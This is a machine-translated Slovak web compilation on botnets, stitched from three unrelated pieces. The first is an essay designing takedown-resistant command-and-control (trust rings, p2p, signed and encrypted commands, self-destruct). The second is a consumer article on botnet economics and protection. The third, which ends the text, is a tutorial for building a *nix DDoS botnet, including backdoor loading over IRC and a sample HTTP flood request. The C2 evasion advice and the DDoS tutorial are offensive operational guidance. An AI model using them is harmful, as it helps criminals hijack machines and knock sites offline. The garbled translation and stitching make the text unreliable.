Aký by mal byť ideálny botnet. Vytvorenie vlastnej bojovej botnety Prečo sa botnety vytvárajú

Nečudo, že som zverejnil návrh svojho článku o sieťach peer-to-peer. Komentáre čitateľov boli veľmi nápomocné. Práve oni ma inšpirovali k ďalšej práci týmto smerom. Čo z toho vzniklo - pozrite sa pod rez.

Ako naznačuje názov príspevku, dnes budeme hovoriť iba o botnetoch. Zabudnime na chvíľu na výmenu súborov, siete proxy, blogy peer-to-peer a menu p2p.

Slovo „botnet“ by nemalo byť chápané ako niečo nezákonné. Keď si užívateľ dobrovoľne stiahne a nainštaluje „robota“, aby daroval svoje prevádzkové a počítačové zdroje potrebám vedeckého projektu, ide tiež o botnet. V dôsledku toho botmaster nie je nevyhnutne vinníkom. Skupina 30 vedcov zapojených do vedeckého projektu je tiež „botmaster“.

1. Riadenie botnetu prostredníctvom servera

Najjednoduchším spôsobom správy robotov je spustenie servera irc / http. Prostredníctvom neho budú roboty dostávať príkazy a s jeho pomocou budú odosielať výsledok ich vykonania.

Kreslím, ako najlepšie viem :) V tomto prípade nemusí byť ilustrácia vyžadovaná, ale rozhodol som sa, že vás pripravím na šok, ktorý ostatné kresby vyprodukujú.

  • Veľmi jednoduchá implementácia, najmä v prípade IRC.
  • Rýchla odpoveď robotov.
  • Príkazy môžete zadávať pre celú sieť aj pre konkrétneho robota.
  • Ak sieť pozostáva zo stoviek uzlov, na jej správu stačí jeden kanál v serveri DalNet. Vo väčších sieťach môžete nájsť lacný webhosting (asi 300 rubľov / mesiac).
  • V prípade HTTP-server výrazne zjednodušuje vývoj krásneho používateľského rozhrania. To je dôležité, ak v akejkoľvek webovej službe používame botnet.
  • Zaťaženie servera. Počet uzlov v najväčších botnetoch sa meria v miliónoch. Na správu takého davu nestačí jeden server.
  • Ak sa niečo stane so serverom (porucha siete, DDoS, požiar v dátovom centre), sieť sa skončí.
  • Jeden server je ľahko firewall. To môže vykonať poskytovateľ aj produkty spoločnosti Kaspersky Lab na počítači používateľa.
  • Botmaster je pomerne ľahké nájsť. Raz som zabudol na VPN - počkajte na hostí v uniformách.
  • V prípade IRC, tímy dostávajú online iba robotov. Ak robot vstúpi do kanála dve minúty po odoslaní príkazu, bude to „mimo tému“.
  • Počet robotov a ich IP je možné určiť prechodom na kanál IRC. Ochrana kanála heslom nepomôže, pretože druhé je ľahké vybrať z kódu robota.

2. Správa prostredníctvom siete IRC

Logickým krokom v boji proti nevýhodám predchádzajúcej metódy je vytvoriť nie jeden server, ale niekoľko. Podľa mňa najľahšie to urobíte nastavením siete IRC. V tomto prípade nesie plná zodpovednosť za prenos údajov medzi servermi protokol IRC. Zo strany robotov nebude žiadny rozdiel v porovnaní s predchádzajúcim riešením.

  • Jednoduchá implementácia, aj keď sa budete musieť pohrať s nastavením serverov.
  • Roboti stále rýchlo reagujú na príkazy.
  • Stále môžete zadávať príkazy konkrétnemu robotovi.
  • Vyrovnávanie záťaže medzi servermi, DDoS a ochrana pred vyššou mocou. Desať dobré servery môže stačiť na sieť milióna robotov.
  • Ak niektoré zo serverov zlyhajú, môžete ich vymeniť.
  • Ak používate IRC a zmätení tisíckami robotov sediacich na jednom kanáli, použite viac kanálov. V súlade s tým môžu byť rôznym častiam siete zverené rôzne úlohy.
  • Budeme musieť nájsť server / VDS.
  • Môžete spúšťať všetky servery súčasne a botmaster ich nestihne nahradiť.
  • Botmaster je stále dostatočne ľahko sledovateľný.
  • V prípade IRC, počet robotov a ich IP sú stále v nedohľadne.
  • Roboti, ktorí práve vstúpili do kanála, sú mimo tému.

Pojem dôvera (dôverný prsteň) som prvýkrát počul od kolegov Nickolasa v komentároch k predchádzajúcemu príspevku. Ide o priradenie funkcie "serverov" časti botnetu.

  • Nie sú potrebné žiadne servery.
  • Trastring môže pozostávať zo stoviek uzlov. Nastavenie a monitorovanie mnohých serverov irc / http nie je jednoduché.
  • Roboti nemusia udržiavať prepojenie kanálov stále. Stačí každých 5-10 minút skontrolovať nové príkazy. Každý tím musí mať TTL, pre ktorý je uložený v trustu.
  • Veľký počet „serverov“ zaisťuje odolnosť siete voči všetkým druhom katastrof. Keď časť prsteňa odumrie, botmaster môže dať príkaz na vytvorenie novej dôveryhodnosti. Alebo to môžu urobiť samotné uzly prsteňa (sú potrebné digitálne podpisy a súhlas určitého percenta dôvery).
  • Predpokladajme, že trunking pozostáva z 512 uzlov, najmenej 50% je neustále online. Ak je v sieti 1 000 000 robotov a každý z nich je neustále online, pre každý dôveryhodný uzol bude existovať menej ako 4 000 robotov. Keď robot požaduje príkazov (alebo pri odosielaní výsledku) každých 10 minút, každý uzol kruhu súčasne spracuje v priemere 7 spojení. Na sieť tejto veľkosti nie je veľa, však?
  • Presný zoznam všetkých robotov môže získať iba botmaster.
  • Príkazy môžete zadávať konkrétnemu robotovi alebo skupine robotov.
  • Rýchla reakcia robotov na príkazy.
  • Botmaster je ťažké nájsť.

Jedinou nevýhodou, ktorú vidím, je zložitosť implementácie.

4. Siete peer-to-peer

Podľa internetových zdrojov sú P2P botnety v súčasnosti veľmi obľúbené. Medzi týmito zdrojmi najväčšia pozornosť si zaslúži. Každý uzol takejto siete pozná iba niekoľko „susedných“ uzlov. Botmaster odosiela príkazy do niekoľkých sieťových uzlov, potom sa prenáša zo suseda na suseda.

Zoznam susedov sa robotom vydá raz na špeciálnom serveri. Môže to byť napríklad napadnutý web. Server nerobí nič iné, je to potrebné iba pri pridávaní uzlov do botnetu.

  • Implementácia je o niečo jednoduchšia ako v predchádzajúcom odseku.
  • Minimálne zaťaženie všetkých uzlov v sieti. Veľkosť botnetu je prakticky neobmedzená.
  • Odolný voči DDoS, výpadkom hostiteľa atď. Brána firewall na platforme p2p je takmer nemožná.
  • Žiadne trvalé spojenia ako s IRC.
  • Potrebujete server, aj keď nie dlho.
  • Uzly z času na čas odumrú, čo má vplyv na konektivitu siete.
  • Ak chcete získať zoznam všetkých robotov, potrebujete ich napríklad poučiť o prístupe na konkrétny web. V tomto prípade neexistuje žiadna záruka, že zoznam dostane iba botmaster.
  • Ak chcete zadať príkaz konkrétnemu uzlu, musíte ho buď odoslať do celej siete, alebo sa k uzlu pripojiť priamo.
  • Pomalá odozva robotov na príkazy.
  • Na odoslanie „dlhého“ príkazu, napríklad so zoznamom adries URL, musíte použiť server tretej strany, inak sa reakcia robotov ešte viac spomalí.
  • Je jednoduchšie nájsť botmastera ako v predchádzajúcom prípade, pretože sa používa nejaký druh servera.

Samozrejme, môžem sa mýliť, ale podľa mňa sú p2p botnety oveľa horšie ako dôverčivé. Možno predajcovia antivírusov o niečom mlčia?

5. Komplexné riešenie

Jeden spôsob, ako vymyslieť niečo nové a dobré, je prekročiť niečo staré. Spojili sme telefón, počítač, magnetofón, kameru a videokameru - dostali sme smartfón. Počítač a ovládanie klimatizácie v aute nikoho neprekvapia. Na každý jogurt prilepte magnet na chladničku a predaj bude raketovo rásť.

Je dôležité mať na pamäti, že v prípade neúspešného kríženia môžeme získať bezcenného jednotlivca. Znie to ako genetické algoritmy, však? Zoberme si zdanlivo dobrý nápad-botnet peer-to-peer, kde za priradenie susedov zodpovedá dôvera. Potom nepotrebujeme žiadny server!

Ale v tomto prípade sa náročnosť implementácie zvýši, aj keď len mierne. Ostatné problémy botnetu p2p zostanú nevyriešené. Výhra je nepodstatná, skóre je 1: 1.

Potom, čo som si trocha sadol s papierom a ceruzkou, prišiel som na nasledujúci nápad. Pokiaľ viem, nikdy predtým to nebolo vyslovené a ja som prvý, kto také niečo vymyslel. ChSV plus 100.

Čo keď má sieť dva stavy - „aktívny“ a „pasívny“. V pasívnom stave botnet funguje na báze p2p. Botmaster vyšle príkaz „mobilizovať jednotky“ a sieť sa zmení na dôverčivú. Botmaster vo svojom tíme musí označiť uzly dôveryhodnosti a čas, do ktorého sieť zmení svoj stav. Aby bol prsteň väčší, môžete niekoľkých robotom nariadiť, aby pomenovali svojich susedov. Ďalej sú všetky príkazy prenášané cez kanál. Je tiež zodpovedný za priradenie „susedov“ k novým uzlom. Ak sa TTL krúžku následne ukáže ako nedostatočný, je možné zadať príkaz „predĺžiť aktívny stav“.

Takýto botnet nezdedí jedinú nevýhodu siete p2p a bude mať všetky výhody dôvery, ako aj nasledujúce:

  • Zvýšená odolnosť voči útokom ddos ​​a sieťovým filtrom, ako je sieť p2p.
  • Minimálna spotreba zdrojov robotmi počas prestojov siete. Botmaster nemusí sledovať stav dôveryhodnosti a vyberať preň nové uzly.
  • Pri vytváraní dôveryhodnosti sa vyberajú iba uzly, ktoré sú práve online. Botky sa na krúžok spoja na prvý pokus (na chvíľu).
  • Zoznam „susedov“ sa pravidelne aktualizuje. Celý botnet však pozná IP uzlov zahrnutých v dočasnom kruhu. Nechajte ich teda považovať za susedov, ak sa niektorí skutoční susedia v sieti už nejaký čas neobjavili.

Jedinou nevýhodou, ktorú tu vidím, je zložitosť implementácie. Ale to naozaj nie je problém.

6. Čo je dôležité mať na pamäti

Doteraz som o niektorých bodoch mlčal, pretože sú súčasťou všetkých vyššie uvedených spôsobov správy botnetu. Mali by ste sa na ne zamerať.

  • Niektorí hostitelia nemôžu prijímať prichádzajúce pripojenia kvôli bráne firewall alebo NAT. Pri písaní robota by to malo byť minimálne zohľadnené. Napríklad pri distribúcii príkazov v sieti p2p musí samotný robot pravidelne kontaktovať svojich susedov a nečakať na príkaz od nich.
  • Malo by sa predpokladať, že sú počúvané všetky príkazy odoslané do siete. Zainteresovaná strana môže na tento účel minimálne zmeniť kód robota. Má však zmysel šifrovať všetok prenos v sieti. Minimálne to skomplikuje analýzu botnetov.
  • Všetky príkazy botmaster musia byť digitálne podpísané. Heslá nie sú dobré, pretože môžu byť zachytené.
  • Pretože hovoríme o implementácii, poznamenávam, že každý botnet musí poskytovať najmenej tri príkazy - aktualizáciu robotov, aktualizáciu kľúča botmastera a sebazničenie celej siete.
  • V sieti sú „špionážne“ uzly. Niektorí z nich sú zaradení do trustu. Zároveň nepoznáme ciele, ktoré títo „špióni“ sledujú - môže to byť identifikácia IP botmastera, narušenie vykonávania príkazov, deaktivácia siete, získanie kontroly nad botnetom a podobne. Konkrétne to znamená, že roboti by si pri pripájaní k kruhu mali zvoliť náhodný uzol a nie používať stále ten istý.
  • Na obrázku sú dôveryhodné uzly prepojené s každým, ale oveľa praktickejšie je implementovať kruh vo forme malej siete p2p, to znamená podľa princípu „susedov“.

Poznamenávam tiež, že riešenia 1 a 2 (server, mnoho serverov) strácajú pri použití mnoho nevýhod a získavajú niekoľko výhod z riešenia 3 (dôvera). Protokol HTTP... Znova posuňte tieto body, aby ste zistili, čo tým myslím.

7. Závery

Pre malé siete dobré rozhodnutie je použitie IRC. Ak napríklad chcete vytvoriť vlastnú malú sieť pre distribuované výpočty, nastavte robota na domáci počítač, prenosný počítač, netbook, pracovný počítač (ak to umožňujú zásady spoločnosti) a spravujte svoju sieť prostredníctvom systému DalNet. V prípade potreby môže byť sieť neskôr „načerpaná“ do trustu. Poskytnete príslušný príkaz, však?

Ak botnet potrebuje krásne webové rozhranie, môže mať zmysel písať doplnkový program ktorý zachytí príkazy z webového servera a odošle ich do IRC. Zvážte aspoň tento prístup.

Univerzálne riešenia sú dôveryhodné a p2p + dôveryhodné. Také siete budú fungovať ideálne bez ohľadu na to, koľko uzlov majú, 1 alebo 1 000 000, bez serverov.

Vzhľadom na to, že „čistý p2p“ má v porovnaní s krúžkom zjavné nevýhody, zostáva mi nejasné, prečo je považovaný za dobré riešenie. Roboti, ktorí tvoria sieť, majú určite veľa užitočných funkcií. Prečo nepridať ešte jedno malé užitočné zaťaženie - dôveryhodná mobilizácia siete?

To je asi všetko. Budem rád za akékoľvek vaše komentáre. Zvlášť pri kritike, údajoch o nepresnostiach / rozporoch v texte a vašich myšlienkach na nastolenú tému.

Botnety sa dnes stali jedným z hlavných nástrojov kybernetických zločincov. ComputerBild vám povie, čo sú botnety, ako fungujú a ako zachrániť váš počítač pred pádom do siete zombie.

Botnet alebo zombie sieť je sieť počítačov infikovaných škodlivým softvérom, ktorá umožňuje útočníkom diaľkovo ovládať stroje iných ľudí bez vedomia ich vlastníkov. V posledných rokoch sa siete zombie stali stabilným zdrojom príjmu počítačových zločincov. Neustále nízke náklady a minimum znalostí potrebných na správu botnetov prispievajú k nárastu popularity, a tým aj počtu botnetov. Útočníci a ich zákazníci zarábajú tisíce dolárov na útokoch DDoS alebo nevyžiadanej pošte uskutočňovanej pomocou zombie sietí.

Je môj počítač napadnutý robotom?

Odpoveď na túto otázku nie je jednoduchá. Faktom je, že je takmer nemožné sledovať interferenciu robotov pri každodennej práci s počítačom, pretože to nijako neovplyvňuje výkon systému. Existuje však niekoľko znakov, pomocou ktorých môžete určiť, či je v systéme prítomný robot:

Neznáme programy sa pokúšajú pripojiť k internetu, ktorý pravidelne hlási rozhorčene firewall alebo antivírusový softvér;

Internetový prenos je veľmi vysoký, aj keď web využívate veľmi striedmo;

V zozname spustených systémových procesov sa objavujú nové, maskované ako bežné procesy systému Windows (napríklad robot môže mať názov scvhost.exe - tento názov je veľmi podobný názvu systému Proces Windows svchost.exe; je dosť ťažké si všimnúť rozdiel, ale je to možné).

Prečo sa vytvárajú botnety

Botnety sú stvorené na zarábanie peňazí. Existuje niekoľko oblastí komerčne výnosného využívania zombie sietí: útoky DDoS, zhromažďovanie dôverných informácií, odosielanie nevyžiadanej pošty, phishing, spam vyhľadávača, podvádzanie počítadiel kliknutí atď. Je potrebné poznamenať, že akýkoľvek smer bude výnosný, bez ohľadu na to, ktorý útočník. zvolí, botnet umožňuje vykonávať všetky uvedené činnosti súčasne.

Útok DDoS (Distributed Denial-of-Service) je útok na počítačový systém, napríklad na webovú stránku, ktorej účelom je priviesť systém k „zrúteniu“, to znamená do stavu, keď už nebude môcť prijímať a spracovávať žiadosti od legitímnych používateľov. Jednou z najbežnejších metód útoku DDoS je odosielanie početných žiadostí na počítač alebo stránku obete, čo vedie k odmietnutiu služby, ak zdroje napadnutého počítača nie sú dostatočné na spracovanie všetkých prichádzajúcich požiadaviek. Útoky DDoS sú pre hackerov hrozivou zbraňou a botnet je ideálnym nástrojom na ich uskutočnenie.

Útoky DDoS môžu byť prostriedkom nekalej súťaže a činmi kybernetického terorizmu. Majiteľ botnetu môže poskytnúť službu každému nie príliš svedomitému podnikateľovi - vykonať útok DDoS na webovej stránke jeho konkurenta. Napadnutý zdroj po takom zaťažení „ľahne“, útočník získa dočasnú výhodu a počítačový zločinec dostane skromnú (alebo nie) odmenu.

Rovnakým spôsobom môžu samotní majitelia botnetov využívať útoky DDoS na vydieranie peňazí od veľkých spoločností. Spoločnosti zároveň uprednostňujú dodržiavanie požiadaviek počítačových zločincov, pretože odstránenie následkov úspešných útokov DDoS je veľmi nákladné. Napríklad v januári 2009 bol jeden z najväčších poskytovateľov hostingu GoDaddy.com vystavený útoku DDoS, v dôsledku ktorého boli tisíce stránok hostených na jeho serveroch takmer deň nedostupné. Finančné straty hostiteľa boli obrovské.

Vo februári 2007 bola vykonaná séria útokov na koreňové servery DNS, ktoré priamo ovplyvňujú normálne fungovanie celého internetu. Je nepravdepodobné, že účelom týchto útokov bol kolaps World Wide Web, pretože existencia zombie sietí je možná iba vtedy, ak internet existuje a funguje normálne. Predovšetkým to vyzeralo ako ukážka sily a možností sietí zombie.

Inzeráty na útočné služby DDoS sú otvorene zverejnené na mnohých fórach príslušnej témy. Ceny za útoky sa pohybujú od 50 do niekoľko tisíc dolárov za deň nepretržitej prevádzky botnetu DDoS. Podľa webovej stránky www.shadowserver.org bolo v roku 2008 vykonaných asi 190 000 útokov DDoS, na ktorých si kyberzločinci mohli zarobiť asi 20 miliónov dolárov. Prirodzene, že táto suma nezahŕňa príjem z vydierania, ktoré je jednoducho nemožné vypočítať.

Zhromažďovanie dôverných informácií

Dôverné informácie uložené v počítačoch používateľov vždy priťahujú votrelcov. Najväčším záujmom sú čísla kreditných kariet, finančné informácie a heslá pre rôzne služby: poštové schránky, servery FTP, messengery atď. Súčasne sú moderné malware umožniť útočníkom vybrať si presne tie údaje, ktoré ich zaujímajú - na to stačí stiahnuť príslušný modul do počítača.

Útočníci môžu ukradnuté informácie buď predať, alebo ich použiť vo svoj prospech. Stovky inzerátov na predaj bankových účtov sa denne objavujú na mnohých online fórach. Náklady na účet závisia od množstva peňazí na účte používateľa a pohybujú sa od 1 do 1 500 dolárov za účet. Dolná hranica naznačuje, že počítačoví zločinci v tomto druhu podnikania sú v priebehu súťaže nútení znižovať ceny. Na to, aby zarobili veľa peňazí, potrebujú stály tok čerstvých dát, a to si vyžaduje neustály rast zombie sietí. Finančné informácie sú obzvlášť zaujímavé pre mykáčov - počítačových zločincov, ktorí sa zaoberajú falšovaním bankové karty.

Ako výnosné sú takéto operácie, možno usúdiť zo známeho príbehu skupiny brazílskych počítačových zločincov, ktorí boli zatknutí pred dvoma rokmi. Prostredníctvom informácií ukradnutých z počítačov dokázali vybrať 4,74 milióna dolárov z bankových účtov bežných používateľov. Získavanie osobných údajov, ktoré priamo nesúvisia s peniazmi používateľa, má záujem aj o zločincov, ktorí sa zaoberajú falšovaním dokumentov, otváraním falošných bankových účtov, nezákonnými transakciami atď.

Ďalším typom informácií zhromažďovaných botnetmi sú adresy E -mail, navyše, na rozdiel od čísel kreditných kariet a čísiel účtov, veľa emailové adresy... Zhromaždené adresy sú ponúkané na predaj a niekedy aj „podľa hmotnosti“ - za megabajt. Hlavnými kupujúcimi takéhoto „produktu“ sú spammeri. Zoznam milióna e-mailových adries stojí od 20 do 100 dolárov a odosielanie e-mailov na rovnaké milióny adries objednaných spammermi stojí 150-200 dolárov. Výhody sú jasné.

Záujem majú aj zločinci Účty rôzne platené služby a internetové obchody. Samozrejme, sú lacnejšie ako bankové účty, ale ich implementácia je spojená s nižším rizikom obťažovania zo strany orgánov činných v trestnom konaní.

Milióny nevyžiadaných správ putujú po celom svete každý deň. Odosielanie nevyžiadanej pošty je jednou z hlavných funkcií moderných botnetov. Podľa spoločnosti Kaspersky Lab je asi 80% všetkých spamov odosielaných prostredníctvom zombie sietí. Z počítačov užívateľov dodržiavajúcich zákony poslali miliardy listov s reklamou „Viagra“, kópie drahých hodiniek, online kasín a podobne, upchali komunikačné kanály a schránky. Hackeri teda ohrozujú počítače nevinných používateľov: adresy, z ktorých sa odosielajú správy, patria do čiernej listiny antivírusových spoločností.

V posledných rokoch sa rozšírila aj samotná sféra spamových služieb: objavil sa spam ICQ, spam v sociálne siete, fóra, blogy. A to je tiež „zásluha“ majiteľov botnetov: koniec koncov nie je ťažké pridať do bot klienta prídavný modul, otváranie obzorov pre nové obchody so sloganmi ako „Spam na Facebooku. Lacné “. Ceny spamu sa líšia v závislosti od cieľového publika a počtu odoslaných e -mailových adries. Rozsah cien za cielené korešpondencie - od 70 dolárov za státisíce adries do 1 000 dolárov za desiatky miliónov adries. Za posledný rok spammeri zarobili na poštách asi 780 miliónov dolárov.

Generovanie spamu z vyhľadávania

Ďalšou možnosťou použitia botnetov je zvýšiť popularitu stránok vo vyhľadávačoch. Na optimalizácii pre vyhľadávače sa správcovia zdrojov pokúšajú zvýšiť pozíciu stránky vo výsledkoch vyhľadávania, pretože čím je vyššia, tým viac návštevníkov príde na stránku prostredníctvom vyhľadávače a preto čím vyššie príjmy bude vlastník stránky získavať, napríklad z predaja reklamného priestoru na webových stránkach. Mnoho spoločností platí webmasterom veľa peňazí za to, aby sa ich stránka dostala na popredné miesta vo „vyhľadávačoch“. Majitelia botnetov špehovali niektoré zo svojich trikov a automatizovali proces optimalizácie pre vyhľadávače.

Keď v komentároch k vášmu príspevku v LiveJournal alebo úspešnej fotografii uverejnenej na hostiteľovi fotografií uvidíte veľa odkazov vytvorených neznámou osobou a niekedy aj vašim „priateľom“, nenechajte sa prekvapiť: práve niekto si objednal propagáciu ich zdroj pre botnet vlastníkov. Špeciálne vytvorený program je načítaný do zombie počítača a v mene jeho majiteľa zanecháva komentáre k obľúbeným zdrojom s odkazmi na propagované stránky. Priemerná cena za nelegálne vyhľadávacie služby spamu je asi 300 dolárov mesačne.

Koľko stoja osobné údaje?

Náklady na odcudzené osobné údaje priamo závisia od krajiny, v ktorej žije ich oprávnený vlastník. Napríklad úplné údaje o obyvateľovi USA stoja 5-8 dolárov. Na čiernom trhu sú obzvlášť cenené údaje od obyvateľov EÚ - sú dvakrát až trikrát drahšie ako údaje od občanov USA a Kanady. To možno vysvetliť skutočnosťou, že tieto údaje môžu zločinci použiť v ktorejkoľvek krajine EÚ. V priemere vo svete je cena kompletného dátového balíka o jednej osobe zhruba 7 dolárov.

Bohužiaľ, každý, kto sa rozhodol zorganizovať botnet od začiatku, ľahko nájde návod, ako vytvoriť zombie sieť na internete. Prvý krok: vytvorte novú sieť zombie. Na to musíte infikovať počítače používateľov špeciálnym programom - botom. Na infekciu sa používa nevyžiadaná pošta, rozosielanie správ na fórach a sociálnych sieťach a ďalšie techniky; Robot je často vybavený vlastnou funkciou rozmnožovania, ako sú vírusy alebo červy.

Na získanie potenciálnej obete, aby si nainštalovala robota, sa používajú techniky sociálneho inžinierstva. Ponúkajú napríklad sledovanie zaujímavého videa, ku ktorému si musíte stiahnuť špeciálny kodek. Po stiahnutí a spustení takého súboru používateľ samozrejme nebude môcť sledovať žiadne video a s najväčšou pravdepodobnosťou si vôbec nevšimne žiadne zmeny a jeho počítač bude infikovaný a stane sa pokorným služobníkom, ktorý bude vykonávať všetky príkazy. vlastníka botnetu.

Druhou široko používanou metódou zamorenia robotov je drive-by-download. Keď používateľ navštívi infikovanú webovú stránku, škodlivý kód sa do jeho počítača stiahne prostredníctvom rôznych „dier“ v aplikáciách - predovšetkým v obľúbených prehliadačoch. Na využitie slabých miest sa používajú špeciálne programy- využíva. Umožňujú nielen nepozorovane sťahovať, ale aj nepozorovane spustiť vírus alebo robota. Tento typ distribúcie škodlivého softvéru je najnebezpečnejší, pretože ak dôjde k hacknutiu obľúbeného zdroja, nakazia sa desaťtisíce používateľov!

Robot môže byť vybavený funkciou vlastného šírenia prostredníctvom počítačové siete... Môže sa napríklad šíriť infikovaním všetkých dostupných spustiteľných súborov alebo vyhľadávaním a infikovaním zraniteľných počítačov v sieti.

Infikované počítače nič netušiacich používateľov môžu byť kontrolované tvorcom botnetu prostredníctvom príkazového centra botnetu, komunikovať s robotmi prostredníctvom IRC, webového pripojenia alebo inými dostupnými prostriedkami. Stačí, keď do siete pripojíte niekoľko desiatok počítačov, aby botnet začal generovať príjem svojmu majiteľovi. Tento príjem je navyše lineárne závislý od stability siete zombie a rýchlosti jej rastu.

Online PPC (Pay-per-Click) reklamné spoločnosti platia peniaze za jedinečné kliknutia na odkazy na online reklamy. Pre majiteľov botnetov je klamanie takýchto spoločností výnosným obchodom. Môžeme si napríklad vziať známe sieť Google Adsense. Prichádzajúci inzerenti platia Googlu za kliknutia na umiestnené reklamy v nádeji, že používateľ, ktorý sa pozrie „na svetlo“, si od nich niečo kúpi.

Google zasa umiestňuje kontextové reklamy na rôzne weby, ktoré sa zúčastňujú programu Adsense, pričom majiteľovi stránky platí percento z každého kliknutia. Bohužiaľ, nie všetci majitelia stránok sú úprimní. V sieti zombie môže hacker vygenerovať tisíce jedinečných kliknutí denne - jedno z každého počítača, aby nevzbudilo podozrenie spoločnosti Google. Peniaze vynaložené na reklamnú kampaň tak poputujú do vrecka hackera. Žiaľ, nikdy sa nestal ani jeden prípad, keď by niekto bol zodpovedný za takéto činy. Podľa Click Forensics bolo v roku 2008 asi 16-17% všetkých kliknutí na reklamné odkazy falošných, z čoho najmenej tretinu vygenerovali botnety. Po vykonaní niekoľkých jednoduchých výpočtov môžete pochopiť, že minulý rok majitelia botnetov „klikli“ na 33 miliónov dolárov. Nie je to zlý príjem z kliknutí myšou!

Útočníci a nepoctiví podnikatelia nemusia vytvárať botnet od nuly sami. Hackeri si môžu kúpiť alebo požičať botnety všetkých veľkostí a výkonov - napríklad kontaktovaním špecializovaných fór.

Náklady na hotový botnet, ako aj náklady na jeho prenájom, priamo závisia od počtu počítačov, ktoré sú v ňom zahrnuté. Hotové botnety sú na fórach v anglickom jazyku najpopulárnejšie.

Malé botnety s niekoľkými stovkami robotov stoja od 200 do 700 dolárov. Priemerná cena jedného robota je zároveň zhruba 50 centov. Väčšie botnety stoja veľa peňazí.

Zombie sieť Shadow, ktorú pred niekoľkými rokmi vytvoril 19-ročný hacker z Holandska, pozostávala z viac ako 100 tisíc počítačov umiestnených po celom svete, sa predala za 25 000 eur. Za tieto peniaze si môžete kúpiť malý dom v Španielsku, ale zločinec z Brazílie sa vybral kúpiť botnet.

Ochrana botnetu

1. V prvom rade ide o antivírusové programy a komplexné balíky na ochranu pred internetovými hrozbami s pravidelne aktualizovanými databázami. Pomôžu nielen včas odhaliť nebezpečenstvo, ale ho aj odstrániť, kým sa váš verný „železný priateľ“, ktorý sa zmenil na zombie, začne rozosielať spam alebo „zhadzujúce“ stránky. Zložité balíky, napríklad Kaspersky internetová bezpečnosť 2009 obsahujú kompletný súbor ochranných funkcií, ktoré je možné ovládať prostredníctvom spoločného veliteľského centra.

Antivírusový modul v pozadie kontroluje kritické oblasti systému a monitoruje všetky možné prieniky vírusov: prílohy e -mailov a potenciálne nebezpečné webové stránky.

Firewall monitoruje komunikáciu medzi osobný počítač a internetu. Kontroluje všetky pakety dát prijatých alebo odoslaných na internet a v prípade potreby blokuje sieťové útoky a zabraňuje tajnému prenosu osobných údajov na internet.

Spamový filter chráni schránka z prieniku reklamných správ. Medzi jeho úlohy patrí aj identifikácia phishingových e -mailov, pomocou ktorých sa kyberzločinci pokúšajú od používateľa vymámiť informácie o jeho prihlasovacích informáciách do online platobných alebo bankových systémov.

2. Pravidelné aktualizácie operačný systém, webové prehliadače a ďalšie aplikácie, ktorých vývojári odhalia a opravia mnohé bezpečnostné medzery a slabé stránky, ktoré útočníci používajú.

3. Špeciálne šifrovacie programy ochránia vaše osobné údaje, aj keď už robot vstúpil do vášho počítača, pretože na prístup k nemu bude musieť prelomiť heslo.

4. Zdravý rozum a opatrnosť. Ak chcete chrániť svoje údaje pred všetkými druhmi hrozieb, nemali by ste sťahovať a inštalovať programy neznámeho pôvodu, napriek antivírusovým upozorneniam otvárať archívy so súbormi, navštevovať stránky, ktoré prehliadač označí ako nebezpečné atď.

Ďakujeme spoločnosti Kaspersky Lab za pomoc pri príprave materiálu.

Bezpečnostné systémy sa neustále zdokonaľujú, programátori sú stále skúsenejší. Teraz sa robí čoraz menej známych chýb.

[prológ]
Internet rastie obrovskou silou. Pre hackera je stále ťažšie nájsť zraniteľné miesta. Správcovia používajú na ochranu vývoja tých najlepších expertov na bezpečnosť. Spoznávate svoje myšlienky? Internet je v skutočnosti plný zraniteľností, a preto ich málo používa. Stále to tak vyzerá. Tu si predstavte situáciu, získali ste sieťového bastarda, chcete ho potrestať. Dnes budeme hovoriť o vytvorení vlastného bojového botnetu.
Čo je teda „bot“. Nezasvätenému človeku sú hlúpi protivníci okamžite vrhnutí do pamäti počítačové hryže môžete vystreliť za dve minúty. Áno, je to čiastočne pravda. V našom prípade je „robot“ program, ktorý vykonáva svoje príkazy. Nič zvláštne. Niekto bude namietať: „Hovorím, že som to napísal v piatich rokoch, stlačíte tlačidlo a program, olya-la, sa zavrie.“ Zabudnime na detstvo. Všetci vieme, že možnosti kódovania sú nekonečné a dajú sa použiť na dobro i zlo. My, samozrejme, pretože vždy používame náš vývoj s dobrými úmyslami. „Botnet“ je sada robotov zhromaždených v jednom centre, ktoré synchrónne vykonávajú príkazy majiteľa. Mimochodom, roboty sú väčšinou zamerané viac Stroje Windows... Tu môžete ukradnúť svoje heslá, vložiť sox a naformátovať skrutku. Odchýlim sa od pravidiel a poviem vám, ako vytvoriť botnet z počítačov nix. Hlavnou funkciou nášho robota je organizovať Útoky DDOS... Toto je ideálny spôsob, ako využiť široké kanály serverov nix. Poďme počítať. Server, ktorý chcete „zaplniť“, je na kanáli 100 Mb. To znamená, že 10-20 robotov stojacich na rovnakom kanáli v okamihu zahltí server. Ak sa môžete skrývať za bránou firewall z jedného servera, potom bohužiaľ neexistuje záchrana od viacerých robotov

[Písanie robota]
Zoznam vzorového robota nájdete podľa odkazu na konci článku. Poďme na to trochu prísť s kódom. (uh, Dream je opäť všetko ovládané cez IRC? Je chladnejšie cez WEB!). Mimochodom, ovládanie pomocou IRC bolo zvolené prostredníctvom jeho interaktivity. Povedzme, že chcem spustiť lokálne jadrové útoky na niekoľkých serveroch v botnete. Jednoducho spustím príkaz SH uname -a pomocou robota a okamžite nájdem počítač, ktorý potrebujem. Potom, čo som tiež vykonal príkaz v klientovi IRC, načítam zadné vrátka a získam interaktívny shell pre ďalšie akcie. Možnosti sú nekonečné. Poviete si - takúto kontrolu môžete implementovať prostredníctvom WEBU, ale prečo znova načítavať stránku a plytvať návštevnosťou? Oveľa pohodlnejšie je sledovať všetko v reálnom čase (aj keď s botnetom viac ako 1 000 robotov sa môžete postarať o pohodlie rozhrania - približne zdravý rozum). Mnoho ľudí si myslí, že organizovanie DDOS je veľmi náročné. Tu je príklad bežného kódu útoku:

GET /server.org HTTP / 1.0 \ r \ nPripojenie: Keep-Alive \ r \ nUživatelský agent: Mozilla / 4,75 (X11; U; Windows 5.2 i686) \ r \ nHost: server.org:80\r\nAccept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, image / png, * / * \ r \ nAccept-Encoding: gzip \ r \ nAccept-Language: en \ r \ nAccept-Charset: iso- 8859-1, *, utf-8 \ r \ n \ r \ n

